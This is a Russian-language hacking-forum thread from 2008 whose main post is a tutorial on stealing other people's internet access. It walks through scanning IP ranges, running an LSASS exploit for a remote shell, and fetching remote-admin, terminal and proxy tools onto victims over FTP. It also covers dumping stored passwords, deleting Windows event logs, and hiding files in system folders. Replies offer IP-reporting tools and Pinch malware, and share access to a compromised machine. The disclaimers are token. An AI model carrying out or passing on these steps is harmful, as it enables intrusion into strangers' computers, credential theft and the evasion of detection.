Статьи Халявный Интернет (для маленьких)

Discussion in 'Статьи' started by stopxaker, 9 Dec 2008.

Thread Status:
Not open for further replies.
  1. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Халявный Интернет (для взрослых и немощных )

    Начну с того , что мне уже порядком недоели темы на форуме , типо "Халявный инет" и тд и тп .


    С этой статье я приведу примеры (Гуру идут лесом ;) ) как можно найти этот самый халявный инетернет , но помните это плохо , и уголовнонаказуемо !!! :mad:

    Начну с того , что инет можно добыть несколькими способами , первый это настоящий взлом , второй способ это впарить жертве трояна , заманить на заражённую ссылку с эксплойтом и тд , и третий прийти к жертве и в наглую поставить ему прокси и юзать его инет !:D

    Бредисловие

    В недавном прошлом , на многих компьютерах стояли , Windows 2000 , Windows XP Home , Windows XP Pro sp1 , так вот все они были уязвимы и взламать их можно было посредством эксплойта SmallSoft Lsa Service Exploit или lsa.exe , этот эксплойт старый и использует уязвимость в lsass.exe, кстати в некоторых сетях до сих пор есть такие машины, которые уязвимы , толи люди не знают про sp2 , sp3 , толи просто им просто лень ставить hotfixы и закрыть 445 порт , хз , мол работает комп, да и ладно :D

    Ну... полетели

    Скачиваем сканер портов Angry IP Scanner идём в настройки , и прописываем порты 21,22,135,138,139,445,1025,4489,3389 и тд и тп
    Выбираем метод сканирование "Alive hosts (repoding pings only), сохраняем ,затем выбираем IP Range и вбиваем ипы вышей сети , к примеру , а так ипы должны быть вашей сети !!!

    Code:
    10.0.0.0-255.255.255.255
    Начинаем сканировать , вот появились первые клиенты , обращаем внимание на тех у кого больше всего открыто портов , затем берём эксплойт SmallSoft Lsa Service Exploit или lsa.exe и вписываем ip жертвы, тип атаки Shell и жмём Начать
    [​IMG]


    если , уязвимость есть то вы получаете командную строку компьютера жертвы cmd.exe, [​IMG]

    то есть вот такое чёрное dos окошечко, если уязвимости нет, окошко повисит и пропадёт и вы идёте лесом :D

    ну допустим мы получили shell , теперь вам будет нужно поднять у себя на компьютере FTP-сервер , я выбрал Serv-U

    Настроить его сможет даже ребёнок , заливаем к себе на фтп сервер нужные нам для дальнейшей работы файлы , выберем радмин сервер,ccproxy.exe и terminal.exe о нём почитать можно тут это замечательная статья от-=lebed=-, но или любой другой софт который вы используете .

    Теперь возвращаемся в наше окошечко с полученным шеллом , и подключаемся к нашему ФТП-серверу

    Code:
    С:\WINDOWS\ftp
    ftp> o
    (to)   (ваш ип) 
    ftp: connect: 127.0.0.1(login): anonymous 
    pass:Enter
    Вошли на свой фтп , и идём в директорую где лежат наши файлы

    Code:
    dir 
    команды по работе с фтп вы можете найти у себя в справке и поддержке , достаточно набрать ftp .

    Так теперь , закачаем на комп жертвы наши файлы :
    PHP:
    get radmin.exe
    get terminal
    .exe

    готово 
    выходим 
    bye 
    идём в директорую куда мы залили наши файлы , лучше выбрать директорую по глубже ;)

    С:\WINDOWS\system32 просмотрим командой dir
    так... вот они голубчики :
    запустим их

    Code:
    С:\WINDOWS\system32\terminal.exe 
    С:\WINDOWS\system32\radmin.exe 
    Ну вот и всё ! теперь мы может всё видеть и делать своё темное дело дальше :D

    Хочу сказать , что мы произвели честный то есть тру взлом , мы никому ничего не впаривали , то есть нашли уязвимость и честно её юзаем , вывод , челу нужно закрыть 445 порт , поставить или обновить антивирь(кстати он тут не причём , бывали случаи когда на компах стоял KAV6 и при этом можно было приспокойной получить shell) и установить хороший фаерволл !

    Летим дальше , думаю вы поняли прочитав статью Лебедя для чего нам нужен terminal.exe , да да да , вот именно , плюс ко всему мы ещё получили бесплатный дедик ! :) так заходим в наш дедик , давайте осмотримся , что тут есть .... угу ... нам нужны пассы от всего что тут есть , скачиваем программу MPR
    запускаем смотрим , ага , вот нам и пасс от аськи , веб форм , и пароли от так желаемого нами интернета .

    Наступает долгожданный момент !!! Но ... мы понимаем , что если мы сейчас запустим тут инет , то вылетим из локалки или не запустим инет вообще :( , так так так , и тут нам на помощь приходит замечательная программка RASPPPOE_099 идём на офф сайт скачиваем , распаковываем в любую папку , далее идём в Панель Управления>Cетевыe подключение>Подключения по локальной сети>Свойства , там Протокол Интеренета TCP/IP жмём Свойства , и выбираем Протокол=Добавить, далее нажмите кнопку «Установить с Диска». Да чё я тут распинаюсь вот тут можно посмотреть и почитать , там даже с картинками http://www.rdtc.ru/internet_ivd_PPPoE_XP.php3

    Так всё готово , бывает что нужно перегрузиться , но в большенстве случаев этого можно и не делать !

    И вот мы уже юзаем чужой инет :( , стыдно ? конечно стыдно и тем более за это есть статья !!! ПОМНИТЕ ОБ ЭТОМ ! не стоит этот всех этих усилий , тем более ,что анлим сейчас стоит копейки !!!

    Ну что теперь осталось скачать любой прокси сервер , установить его на компе жертвы , вернуться к себе , затем в FireFox>Инстументы>Настройки>Дополнительно>Network=Settings=Manual Proxy configuration , вписываем ип жертвы и порт нашего прокси сервера . И радуемся чужому инету :D

    Потом если у жертвы анлим , то можно уже с его компа производить сканирование портов и дальнейшие взломы , а вот ещё чуть не забыл , чтобы не палится нужно чистить лог , зайдите сюда C:\WINDOWS\system32\config , AppEvent.Evt , SecEvent.Evt и тд , и удалите их на фиг , если будут проблемы с удалением и чисткой , скачайте Unlocker и он поможет решить все ваши проблемы .

    Если кому в лом искать и качать данный софт , залил Вот всё в одном флаконе !!! terminal.exe KAV_keygen=радмин, ipscan и старый сплойт , в архиве lsa.rar, RASPPPOE_099.ZIP,CCProxy.rar, Keygen KAV_all.exe=радмин-сервер , хочу заметить , что пинчей и всякой прочей лабуду в этих файла нет , отмечу что на CCProxy.ехе после обработки его Reshackom стал рычать на него Nod 32 , с радмином я думаю всё тоже ясно , но по крайне мере это юзалось , то однин Каспер на него повизгивал и тогда когда конектишься к нему через TELNET , мол атака RootShell , Telminal.exe тоже не буду выкладывать , сначало почитайте статью Лебедя -=lebed=-тут там и скачаете Terminal.exe , MPR тоже выкладывать не буду потому что на него рычат антивири , мол Троян PWS , чтобы потом не было предъяв , мол я кому то троя пытался впарить !!!

    Послесловие :

    Надеюсь после этой статейки , больше не будет тем " Халявный Инет и тд и тп "(стану модером буду банить за такие топы :D ) и помните это уголовно наказуемо и противозаконно ! не
    использовать на практике !!!!


    Всего всем доброго , удачи ;)

    http://metasploit.ru
     
    #1 stopxaker, 9 Dec 2008
    Last edited: 11 Dec 2011
    26 people like this.
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Познавательно..., лови +2 )
     
    1 person likes this.
  3. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Спасибо :) , но у меня есть одна проблема , блин теряю компы :( , то есть ипы у всех динамо , и трудно потом искать их по всей стране , кто какую прогу может посоветовать , чтобы она хотя бы мне на мыло ипы отстукивала , пинча и прочию гадость не предологать
     
    1 person likes this.
  4. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    ппц нах его доставать он стал уже настока дешевым и доступным до неприличия просто
    а уж еси так вам приспичило то пинч решит любую вашу проблему (ну почти)

    ппц нах статью еще писать

    убило вообще
     
    1 person likes this.
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Да, именно так просто всё и было... когда-то - настальжи... Вспомним ещё авторутер KAHT2 который проходился по диапазонам IP и напоровшись на дырявую винду давал CMD-шелл. :)
    P.S. Флейм в разделе запрещён!
     
    #5 -=lebed=-, 9 Dec 2008
    Last edited: 10 Dec 2008
    2 people like this.
  6. St0nX

    St0nX Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    257
    Likes Received:
    46
    Reputations:
    0
    Проще написать проксю и впарить. А это уже года 2 - 3 как не актуально.
     
  7. NeXArmAor

    NeXArmAor Banned

    Joined:
    21 Apr 2007
    Messages:
    226
    Likes Received:
    161
    Reputations:
    6
    Есть такая прога у меня. Отсылает на mail каждые 10 минут IP адрес компа.
     
  8. Kluivert

    Kluivert Banned

    Joined:
    22 Mar 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Актуально поиметь халявный инет с EDGE к примеру мегафон модем, билайн и МТС, пока ничего путного найти не получилось.
     
  9. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Эту статейку я написал для ознакомления , как иметь инет с билайна и МТС понятия не имею ! ;)

    ну ладно это ерунда , у меня тут другая проблема , есть доступ к компу с радмином , то есть там их стояло два один версии 2.2 , другой 3 , тот что был версии 2.2 , его перебил своим радмином , но вот что то не могу понять , если я пишу этот ип в браузере , то попадаю на страницу

    бла бла

    внизу написанно

    но на этом же ипе я сижу у него на компе но там Windows XP , смотрел на компе вроде виртуалки нет !!!! Но на рабочем столе вижу есть Putty , что это может быть ??? просто я ещё с такими делами не сталкивался ! :rolleyes:

    Если кому инетересно посмотрите , в ПМ скину ip и пароль от радмина , только тем у кого репа не ниже Эксперт, Гуру (без обид)
     
    #9 stopxaker, 10 Dec 2008
    Last edited: 10 Dec 2008
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Норм статья))
     
    1 person likes this.
  11. snipero4ek

    snipero4ek Elder - Старейшина

    Joined:
    27 Jul 2008
    Messages:
    203
    Likes Received:
    36
    Reputations:
    25
    Думаю лучше заплатить денег, не советую лазить под другими акками из сети,у самого забирали за это комп,хорошо что всё прошло благополучно..
     
  12. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Ты прав , но согласись , чтобы знать как защитить систему , нужно в первую очередь знать , как её взломать ! ;)
     
    #12 stopxaker, 11 Dec 2008
    Last edited: 11 Dec 2008
    2 people like this.
  13. zL0Bniy keNt

    zL0Bniy keNt Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    25
    Likes Received:
    22
    Reputations:
    -6
    Ты очень сильно помог,я с другом поспорил он проиграл,я с этого 1кес поимел,лови за это плюсик+!
     
  14. Brytis

    Brytis New Member

    Joined:
    16 Dec 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Статья хорошо написана, но она не актуальна, я так и некого не нашол с sp1 ) тебе +1
     
  15. Diam0nd

    Diam0nd Member

    Joined:
    16 Dec 2008
    Messages:
    9
    Likes Received:
    5
    Reputations:
    0
    Отличная статья! Спасибо!
     
  16. Brytis

    Brytis New Member

    Joined:
    16 Dec 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Выложите пожалуйста сервер радмина, и ешё почему в cmd не распаковываются файлы в .exe ?
     
  17. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    241
    Likes Received:
    34
    Reputations:
    8
    :D .Прикалываешься что ле???
     
  18. Sn0wSky

    Sn0wSky Member

    Joined:
    18 Nov 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    StopXakep, во-первых... одно слово в твоем нике те не подходит
    во-вторых... я тебе помогу, когда:

    1. Стану экспертом
    2. Вылезу из под стола :))))))))))))))))))))))))





    P.S Ктулху среди нас o_O
     
  19. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Сервер радмина я выкладывал тут смотри вложение soft_all.zip там terminal.exe, keygen_KAV_all.exe, lsa.exe , keygen_KAV_all.exe это и есть сервер радмина !!!! Думаю с этим понятно , теперь с файлами .ехе через сmd , поясню значит так для начала , нужно подключится к своему радмину , через телнет , затем перейти в нужную вам директорию , например я люблю прятать файлы в C:\WINDOWS\system32\spool\drivers\w32x86 уж в неё точно обычный юзер не станет смотреть , ну а новичку у которых
    нужно , вот ты попал в телнет по средством радмина тот же cmd

    Code:
    Microsoft Windows XP [Версия 5.1.2600]
    (С) Корпорация Майкрософт, 1985-2001.
    
    C:\Documents and Settings\Admin>
    далее набираешь команду cd\

    и переходишь вот сюда

    Code:
    Microsoft Windows XP [Версия 5.1.2600]
    (С) Корпорация Майкрософт, 1985-2001.
    
    C:\Documents and Settings\Admin>cd\
    
    C:\>
    вот , потом конектишься к своему радмину в режиме "Передача файлов" и заливаешь на диск С:\ свои файлы , и просматриваешь их командой dir

    Code:
    C:\>dir
     Том в устройстве C не имеет метки.
     Серийный номер тома: XXX-XXX
    
     Содержимое папки C:\
    
    15.12.2008  19:47                 0 AUTOEXEC.BAT
    15.12.2008  19:47                 0 CONFIG.SYS
    16.12.2008  11:20    <DIR>          Documents and Settings
    21.03.2007  14:39             4*740 key.bat
    14.09.2007  13:29           787*423 keygen_KAV_all.exe
    05.11.2007  12:17           837*640 mpr103nulled.exe
    28.01.2008  03:29           784*421 mpr103nulled.rar
    17.12.2008  12:41    <DIR>          Program Files
    14.09.2007  13:29           787*423 system.exe
    21.03.2007  01:00           198*143 terminal.exe
    17.12.2008  12:42    <DIR>          WINDOWS
    17.12.2008  22:37    <DIR>          Новая папка
                   8 файлов      3*399*790 байт
                   4 папок   2*078*269*440 байт свободно
    
    C:\> 
    потом выбираете свой файл и запускаете его

    C:\>system.exe Enter

    Думаю теперь всё будет ясно !!!

    ps отписал это специально для того , чтобы впредь не было таких вопросов ;)
     
    #19 stopxaker, 17 Dec 2008
    Last edited: 18 Dec 2008
  20. moob

    moob New Member

    Joined:
    30 Oct 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Хмм
    А службы не зависят?

    А то атака проходит а подключиться все равно нельзя
     
Thread Status:
Not open for further replies.